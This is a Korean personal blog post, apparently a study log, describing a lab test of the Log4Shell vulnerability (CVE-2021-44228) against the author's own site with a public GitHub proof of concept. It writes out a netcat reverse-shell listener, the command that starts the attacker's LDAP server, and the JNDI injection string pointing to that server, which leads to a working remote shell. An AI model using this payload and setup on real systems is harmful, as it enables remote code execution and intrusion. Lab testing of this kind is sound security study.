전체 글에 해당하는 글 119

Log4j 취약점 테스트-2

보안공부/기타|2024. 11. 23. 01:32

내가 직접 구축한 ldap 서버로는 테스트가 잘 되지 않아서 깃허브에 올라온 서버로 한번 테스트를 해봤다.

 

https://github.com/kozmer/log4j-shell-poc

 

GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

A Proof-Of-Concept for the CVE-2021-44228 vulnerability. - GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

github.com

 

poc.py를 실행하면 공격자용 ldap 서버를 실행시킬 수 있다.

(취약한 사이트 코드도 있어서 취약한 사이트를 실행시켜서 테스트를 할 수도 있다. 그러나 나는 내가 만든 사이트를 이용하려고 한다.)

 

1. 다운로드

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
pip3 install –r requirements.txt

 

실행시키기 전에 jdk1.8.0_20 폴더를 내부에 위치시켜야 한다.

나는 https://ssjune.tistory.com/150 이 때 다운로드한 java 11 버전의 jdk 폴더를 log4-shell-poc 폴더내에 jdk1.8.0_20 라는 이름으로 바꿔서 넣었다.

 

2. 리버스 쉘 및 ldap 서버 실행

nc –nlvp 9001

python3 poc.py —userip 10.0.2.15 --webport 8000 —lport 9001

 

한 곳에서는 nc 명령어로 대기를 한다.

 

한 곳에서는 poc.py를 실행시켰다.

 

${jndi:ldap://192.168.0.14:1389/a}

취약한 사이트에서 위의 입력을 하게되면...

 

 

ldap 서버에서 Exploit.class를 리턴한것으로 보인다.

 

해당 Exploit.class 파일로 인해 리버스 쉘이 연결되었고 ls 명령을 사용할 수 있게 되었다.

반응형

'보안공부 > 기타' 카테고리의 다른 글

Log4j 취약점 테스트-1  (0) 2024.11.22
ldap 설치  (0) 2024.11.18
Log4j 설치  (0) 2024.11.15
JSP 테스트  (0) 2024.11.15

댓글()